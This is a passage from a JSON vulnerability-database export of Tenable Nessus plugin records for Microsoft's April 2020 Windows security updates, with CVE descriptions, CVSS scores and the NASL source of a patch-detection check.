"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:10:37", "description": "The remote Windows host is missing security update 4550970 or cumulative update 4550961. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550970: Windows 8.1 and Windows Server 2012 R2 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0938", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550961.NASL", "href": "https://www.tenable.com/plugins/nessus/135471", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135471);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0938\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550961\");\n script_xref(name:\"MSKB\", value:\"4550970\");\n script_xref(name:\"MSFT\", value:\"MS20-4550961\");\n script_xref(name:\"MSFT\", value:\"MS20-4550970\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550970: Windows 8.1 and Windows Server 2012 R2 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550970\nor cumulative update 4550961. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0945,\n CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550970/windows-8-1-kb4550970\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550961/windows-8-1-kb4550961\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550970 or Cumulative Update KB4550961.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550961', '4550970');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550961, 4550970])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:12:13", "description": "The remote Windows host is missing security update 4550965 or cumulative update 4550964. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550964.NASL", "href": "https://www.tenable.com/plugins/nessus/135472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135472);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n 